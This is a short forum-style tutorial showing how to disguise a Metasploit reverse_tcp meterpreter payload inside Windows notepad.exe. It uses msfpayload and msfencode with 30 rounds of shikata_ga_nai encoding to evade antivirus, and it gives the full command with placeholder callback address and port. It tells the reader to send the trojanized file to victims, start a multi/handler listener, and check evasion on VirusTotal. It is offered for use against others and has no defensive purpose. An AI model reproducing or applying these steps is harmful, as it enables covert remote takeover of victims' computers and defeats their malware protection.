Hi everyone in my first post i will show you how to create a reverse meterpreter payload from a "clear" windows exe file and then
we will encoded to avoid most Av's. I will use shikata_ga_nai as encoder but you can use more than one encoder for bettet result
and even more you can remove all the bad chars and generate some Nop shellcode for more advance result.
To see all the msfencoders you can use the msfsncode -l command.
In this tutorial i will use the notepad.exe from windows.
Before we start i will post all the variables will be given just for the people who dont know what every variable is.
-e = selection of encode
-c = how many time we will encode are payload
-t = file format
-x = determines the executable file that is what we want to encode
-o = save the new file
First copy the notepad.exe and paste it on your kali desktop.
Ok now we open are terminal and use this code:
msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=XXXX R | msfencode -e x86/shikata_ga_nai -c 30 -t exe -x
/root/Desktop/notepad.exe -o /root/Desktop/notepad2.exe and hit enter....wait until creates the payload and encoded 30 time as we
given. If everything was right you will see a notepad2.exe file on your desktop, thats are payload. So now we can sent are payload
to the victim or upload it for more victims.
You have to use multi/hanlder exploit and dont forget to use the same options with the payload (LPORT etc).
After uploaded to online scanner as virus_total the result was 6/54 good enough for me
note: sometimes if you use 2 encoders it may broke the payload and you will never get the session.
With the same way you can encode every payload.
